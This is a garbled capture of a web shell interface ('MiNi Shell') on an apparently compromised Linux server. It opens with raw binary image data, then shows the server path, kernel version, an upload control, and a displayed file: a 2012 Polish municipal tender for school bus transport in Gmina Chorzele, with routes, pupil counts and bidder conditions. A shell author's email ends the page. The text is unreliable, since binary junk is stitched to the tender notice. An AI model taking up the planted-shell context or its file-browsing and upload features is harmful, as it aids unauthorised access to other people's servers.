JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120718/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120718/258086-N-2012.html

<p class="kh_header"><b>Chorzele: dowóz uczniów do szkół/przedszkola na terenie Gminy Chorzele w roku szkolnym 2012/2013</b><br>
<b>Numer ogłoszenia: 258086 - 2012; data zamieszczenia: 18.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Chorzele , ul. Stanisława Komosińskiego 1, 06-330 Chorzele, woj. mazowieckie, tel. 29 7515161, faks 29 7515686.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminachorzele.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dowóz uczniów do szkół/przedszkola na terenie Gminy Chorzele w roku szkolnym 2012/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia stanowi usługa obejmująca dowóz uczniów z miejsca ich zamieszkania do szkół-przedszkola na terenie Gminy Chorzele oraz odwóz uczniów ze szkół/przedszkola do miejsca zamieszkania w roku szkolnym 2012-2013 w dni nauki szkolnej przyjmując organizację roku szkolnego zgodnie z Rozporządzeniem Ministra Edukacji Narodowej i Sportu z dnia 18 kwietnia 2002 r. (Dz. U. Nr 46, poz. 432 ze zm.). Dowóz odbywał się będzie w godzinach umożliwiających przybycie uczniów do szkoły i przedszkola nie później niż 10 minut przed ustaloną godziną rozpoczęcia zajęć szkolnych/przedszkolnych i opuszczenie szkoły-przedszkola o ustalonej przez Zamawiającego godzinie. Wykonawca zobowiązuje się świadczyć usługi w oparciu o rozkład jazdy dla określonej trasy, sporządzony przez               Wykonawcę do 28 sierpnia 2012 r. i zatwierdzony przez Zamawiającego. 
1) Zadanie 1.
Dowóz uczniów do:
a) Przedszkola Samorządowego w Chorzelach według następującego wykazu:
1. Grąd Rycicki, liczba uczniów - 1;
2. Przysowy, liczba uczniów - 3;
3. Brzeski Kołaki, liczba uczniów - 3;
4. Rembielin, liczba uczniów - 8;
5. Raszujka, liczba uczniów - 1;
6. Budki, liczba uczniów - 4;
7. Bogdany Wielkie, liczba uczniów - 2;
8. Bagienice, liczba uczniów - 4;
9. Przątalina, liczba uczniów - 1;
10. Opaleniec, liczba uczniów - 2;
11. Chorzele Stacja, liczba uczniów - 2
Razem liczba uczniów - 31
b) Szkoły Podstawowej im. Marszałka Józefa Piłsudskiego w Chorzelach według następującego wykazu:
1. Zagaty, liczba uczniów - 2;
2. Przysowy, liczba uczniów - 9;
3. Brzeski Kołaki, liczba uczniów - 11;
4. Budki, liczba uczniów - 14;
5. Opaleniec, liczba uczniów - 22;
6. Bagienice, liczba uczniów - 12;
7. Bogdany Wielkie, liczba uczniów - 4;
8. Bogdany Małe, liczba uczniów - 2;
9. Niskie Wielkie, liczba uczniów - 2;
10. Bobry, liczba uczniów - 1;
11. Rembielin, liczba uczniów - 10;
12. Chorzele Stacja, liczba uczniów - 3;
13. Grąd Rycicki, liczba uczniów - 2;
Razem liczba uczniów - 94
c) Publicznego Gimnazjum im. Papieża Jana Pawła II w Chorzelach według następującego wykazu:
1. Zagaty, liczba uczniów - 1;
2. Przysowy, liczba uczniów - 4;
3. Brzeski Kołaki, liczba uczniów - 4;
4. Raszujka, liczba uczniów - 13;
5. Budki, liczba uczniów - 6;
6. Bagienice, liczba uczniów - 6;
7. Bogdany Wielkie, liczba uczniów - 8;
8. Bogdany Małe, liczba uczniów - 4;
9. Niskie Wielkie, liczba uczniów - 4;
10. Przątalina, liczba uczniów - 3;
11. Rembielin, liczba uczniów - 11;
12. Opaleniec, liczba uczniów - 10;
13. Chorzele Stacja, liczba uczniów - 2;
Razem liczba uczniów - 76
d) Zespołu Szkół w Krzynowłodze Wielkiej według następującego wykazu:
1. Kwiatkowo, liczba uczniów - 4;
2. Lipowiec, liczba uczniów - 8;
3. Rycice, liczba uczniów - 11;
4. Czaplice Bąki, liczba uczniów - 2;
5. Aleksandrowo, liczba uczniów - 4;
6. Łazy, liczba uczniów - 1;
7. Gadomiec Miłocięta, liczba uczniów - 8;
8. Romany Karcze, liczba uczniów - 3;
9. Romany Sędzięta, liczba uczniów - 2;
10. Gadomiec Wyraki, liczba uczniów - 2;
Razem liczba uczniów - 45
2) Dowóz do wyżej wymienionych szkół/przedszkola obejmuje następujące kursy:
a) Chorzele - Rembielin - Chorzele - 3 kursy dziennie o długości trasy jednego kursu wynoszącej ok.6 km (autobus),
b) Chorzele - Brzeski Kołaki - Przysowy - Grąd Rycicki - Zagaty - Chorzele - 3 kursy dziennie o długości trasy jednego kursu wynoszącej ok. 18 km (autobus),
c) Chorzele - Budki - Raszujka - Chorzele - 3 kursy dziennie o długości trasy jednego kursu wynoszącej ok. 17 km (autobus),
d) Chorzele - Opaleniec - Chorzele - 3 kursy dziennie o długości trasy jednego kursu wynoszącej ok. 14 km (autobus),
e) Chorzele - Bogdany Małe - Bogdany Wielkie - Niskie Wielkie - Bagienice - Chorzele - 3 kursy dziennie o długości trasy jednego kursu wynoszącej ok. 16 km (autobus),
f) Chorzele - Stacja PKP Chorzele - Chorzele - 3 kursy dziennie o długości trasy jednego kursu wynoszącej ok. 11 km (bus),
g) Chorzele - Bagienice Kolonia - Chorzele - 3 kursy dziennie o długości trasy jednego kursu wynoszącej ok. 8,2 km (bus),
h) Chorzele - Budki - Chorzele - 3 kursy dziennie o długości trasy jednego kursu wynoszącej ok. 13 km (autobus),
i) Chorzele - Przątalina - Chorzele - 3 kursy dziennie o długości trasy jednego kursu wynoszącej ok. 6,8 km (samochód osobowy).
j) Krzynowłoga Wielka - Gadomiec Miłocięta - Gadomiec Wyraki - Krzynowłoga Wielka - 3 kursy dziennie o długości trasy jednego kursu wynoszącej ok. 19 km (autobus),
k) Krzynowłoga Wielka - Kwiatkowo - Krzynowłoga Wielka - 3 kursy dziennie o długości trasy jednego kursu wynoszącej ok. 16,4 km (bus),
l) Krzynowłoga Wielka - Czaplice Bąki - Krzynowłoga Wielka - 3 kursy dziennie o długości trasy jednego kursu wynoszącej ok. 8 km (autobus),
m) Krzynowłoga Wielka - Lipowiec - Aleksandrowo - Rycice - Krzynowłoga Wielka - 3 kursy dziennie o długości trasy jednego kursu wynoszącej ok. 11,5 km (autobus).
Razem dzienna ilość kilometrów:
a) autobus: 367,5 km,
b) bus: 106,8 km
c) samochód osobowy: 20,4 km
Razem miesięczna ilość kilometrów:
a) autobus: 367,5 km x 22 dni = 8085 km
b) bus: 106,8 km x 22 dni = 2349,6 km
c) samochód osobowy: 20,4 km x 22 dni = 448,8 km
Razem 10 - miesięczna ilość kilometrów:
a) autobus: 8085 km x 10 miesięcy = 80850 km
b) bus: 2349,6 km samochód x 10 miesięcy = 23496 km
c) samochód - osobowy: 448,8 km x 10 miesięcy = 4488 km
3) Zadanie 2.
Dowóz uczniów do:
a) Zespołu Szkół w Zarębach według następującego wykazu:
1. Binduga, liczba uczniów - 9;
2. Krukowo, liczba uczniów - 24;
3. Rzodkiewnica, liczba uczniów - 32;
4. Poścień Wieś, liczba uczniów - 8;
5. Poścień Zamion, liczba uczniów - 6;
6. Pruskołęka, liczba uczniów - 3;
7. Łaz, liczba uczniów - 31;
8. Wierzchowizna, liczba uczniów - 7;
9. Mącice, liczba uczniów - 25;
10. Ścięciel, liczba uczniów - 3;
11. Nowa Wieś Zarębska, liczba uczniów - 7;
12. Rawki, liczba uczniów - 6;
13. Sosnówek, liczba uczniów - 1;
14. Zaręby Podrzecze, liczba uczniów - 1;
Razem liczba uczniów - 163
b) Szkoły Podstawowej w Krukowie według następującego wykazu:
1. Binduga, liczba uczniów - 14;
2. Rzodkiewnica, liczba uczniów - 20;
3. Rawki, liczba uczniów - 3;
4. Wierzchowizna, liczba uczniów - 4;
5. Skuze, liczba uczniów - 1;
6. Nowa Wieś Zarębska, liczba uczniów - 6;
7. Krukowo, liczba uczniów - 5;
Razem liczba uczniów - 53
c) Szkoły Podstawowej w Pościeniu Wsi według następującego wykazu:
1. Poścień Zamion, liczba uczniów - 6;
2. Pruskołęka, liczba uczniów - 11;
3. Raszujka, liczba uczniów - 13;
Razem liczba uczniów - 30;
4) Dowóz do ww. szkół obejmuje następujące kursy:
a) Zaręby - Łaz - Mącice - Zaręby - 3 kursy dziennie o długości trasy jednego kursu wynoszącej ok. 24,6 km (autobus),
b) Zaręby - Poścień Wieś - Poścień Zamion - Zaręby - 2 kursy dziennie o długości trasy jednego kursu wynoszącej ok. 26,6 km (autobus),
c) Zaręby - Ścięciel - Zaręby - 3 kursy dziennie o długości trasy jednego kursu wynoszącej ok.20,8 km (samochód osobowy),
d) Zaręby - Zaręby Podrzecze - Zaręby - 2 kursy dziennie o długości trasy jednego kursu wynoszącej ok. 8 km (samochód osobowy),
e)  Zaręby - Rzodkiewnica - Rawki - Zaręby - 3 kursy dziennie o długości trasy jednego kursu wynoszącej ok.34,8 km (autobus),
f) Zaręby- Rawki - Zareby - 2 kursy dziennie o długości trasy jednego kursu wynoszącej ok. 29,4 km (bus),
g) Zaręby - Rzodkiewnica - Zaręby - 1 kurs dziennie o długości trasy jednego kursu wynoszącej ok. 21,8 km (bus),
h) Krukowo - Rzodkiewnica - Krukowo - 1 kurs dziennie o długości trasy jednego kursu wynoszącej ok. 12 km (bus),
i) Krukowo - Nowa Wieś - Krukowo - 1 kurs dziennie o długości trasy jednego kursu wy-noszącej ok. 8 km (bus),
j) Krukowo - Binduga - Krukowo - 1 kurs dziennie o długości trasy jednego kursu wynoszącej ok. 7 km (bus),
k) Krukowo - Nowa Wieś Zarębska - Binduga - Krukowo - 1 kurs dziennie o długości trasy jednego kursu wynoszącej ok. 10 km (bus),
l) Krukowo - Nowa Wieś Zarębska - Binduga - Rzodkiewnica - Krukowo - 1 kurs dziennie o długości trasy jednego kursu wynoszącej ok. 24 km (autobus),
m) Poścień Wieś - Poścień Zamion - Pruskołęka - Raszujka - Poścień Wieś - 3 kursy dziennie o długości trasy jednego kursu wynoszącej ok. 14,3 km (autobus).
Razem dzienna ilość kilometrów:
a) autobus: 298,30 km ,
b) bus: 117,60 km
c) samochód osobowy: 78,4 km
Razem miesięczna ilość kilometrów:
a) autobus: 298,30 km x 22 dni = 6562,60 km
b) bus: 117,60 km x 22 dni = 2587,20 km
c) samochód osobowy: 78,4 km x 22 dni = 1724,8 km
Razem 10 - miesięczna ilość kilometrów:
a) autobus: 6562,60 km x 10 miesięcy = 65626 km
b) bus:  2587,2 km samochód 10 miesięcy = 25872 km
c) samochód osobowy: 1724,8 x 10 miesięcy = 17248 km
5) Zamawiający przewiduje możliwość zmiany ilości kursów w poszczególnych zadaniach, jak również zmianę (w górę i dół) długości trasy jednego kursu, jeżeli wystąpią okoliczności uzasadniające potrzebę takiej zmiany. Do takich okoliczności Zamawiający w szczególności zalicza: zmianę godzin lekcyjnych, wypadki losowe uczniów powodujące wydłużenie trasy kursu, zmniejszenie lub zwiększenie liczby uczniów dowożonych w ramach poszczególnych tras. Dokładna ilość kilometrów na poszczególnych trasach zostanie ustalona z Przewoźnikiem po przejechaniu trasy dowozu, który wygra przetarg na daną trasę z chwilą rozpoczęcia dowozu.
6) Zapewnienie opieki nad dowożonymi uczniami należy do zadań Przewoźnika.
7) Dowóz należy zorganizować w godzinach 7:00 do 8:00, odwóz natomiast w godzinach ustalonych w porozumieniu z dyrektorami szkół.
8) W ofercie należy podać stałą cenę (obowiązującą przez cały okres trwania umowy) za 1 km przejechanej trasy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie oceniony według kryterium: spełnia - nie spełnia. Warunek uznany zostanie za spełniony, jeżeli Wykonawca wykaże posiadanie aktualnej licencji na wykonywanie krajowego przewozu drogowego osób, zgodnie z ustawą z 06 września 2001r. o transporcie drogowym (t.j. Dz.U. z 2007, Nr 125, poz. 874, ze. zm.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie oceniony według kryterium: spełnia - nie spełnia.
Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że wykonał lub wykonuje w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 usługę polegającą na dowozie uczniów wraz z zapewnieniem opieki przez okres co najmniej jednego roku szkolnego  o wartości minimum 800.000,00 zł brutto - w przypadku oferty złożonej na całość zamówienia (w przypadku ofert złożonych na jedno zadanie - należy wykazać co najmniej 1 usługę o wartości minimum 400.000,00 zł. brutto), oraz załączy dokumenty potwierdzające, że usługi te zostały wykonane należycie.  Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia mogą wykazać, że łącznie spełniają powyższy warunek</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie oceniony według kryterium: spełnia - nie spełnia.
Warunek uznany zostanie za spełniony jeżeli Wykonawca wykaże dysponowanie co najmniej:
na zadanie 1:  
3 autobusami (2 autobusy po min. 40 miejsc siedzących oraz 1 autobus zastępczy min. 50 miejsc siedzących), 2 busy po min 15 miejsc siedzących i jeden samochód osobowy. 
na zadanie 2:   
3 autobusami (2 autobusy po min. 40 miejsc siedzących oraz 1 autobus zastępczy min. 50 miejsc siedzących), 2 busy po min 15 miejsc siedzących i jeden samochód osobowy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie oceniony według kryterium: spełnia - nie spełnia.
Wymagane jest dysponowanie kierowcami z odpowiednią kategorią prawa jazdy przystosowaną do pojazdów biorących udział w zamówieniu. Warunek zostanie spełniony, jeżeli Wykonawca załączy wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie oceniony według kryterium: spełnia - nie spełnia. Warunek zostanie uznany za spełniony, jeżeli Wykonawca posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności i przedłoży opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - na kwotę nie mniejszą niż 800.000,00 złotych na całość zamówienia (w przypadku ofert składanych na jedno zadanie - na kwotę minimum 400.000,00 zł.)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, na następujących warunkach:
1. zmianie może ulec zakres przedmiotu umowy w przypadku gdy nastąpi zmiana trasy przejazdów;
2. zmianie może ulec kwota wynagrodzenia brutto w przypadku:
2.1. zmiany stawki podatku VAT, odpowiednio do przepisów prawa             wprowadzających zmianę,
2.2. w przypadku zmiany rynkowych cen paliwa o minimum 10%, wysokość wynagrodzenia ryczałtowego za km przewozu odpowiednio może być podwyższona lub obniżona.
3. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gminachorzele.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Chorzelach, ul. Stanisława Komosińskiego 1, p. Marta Drężek-Wudkiewicz, tel. (29) 751 65 34, faks (29) 751 56 86, od poniedziałku do piątku w godz. 8.30-15.30..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.07.2012 godzina 12:00, miejsce: Urząd Miasta i Gminy w Chorzelach, ul. Stanisława Komosińskiego 1, 06-330 Chorzele, pokój: sekretariat (I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com